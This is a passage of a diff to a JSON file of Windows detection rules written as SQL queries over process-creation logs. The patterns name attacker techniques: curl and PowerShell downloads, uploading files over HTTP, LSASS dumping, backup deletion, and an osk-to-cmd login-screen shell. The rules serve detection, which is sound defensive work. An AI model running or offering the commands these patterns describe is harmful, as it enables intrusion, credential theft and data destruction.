((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE 
'%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": 
"experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel 
= 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND 
(CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE 
'\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE 
'%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR 
CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' 
ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' 
OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": 
"Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
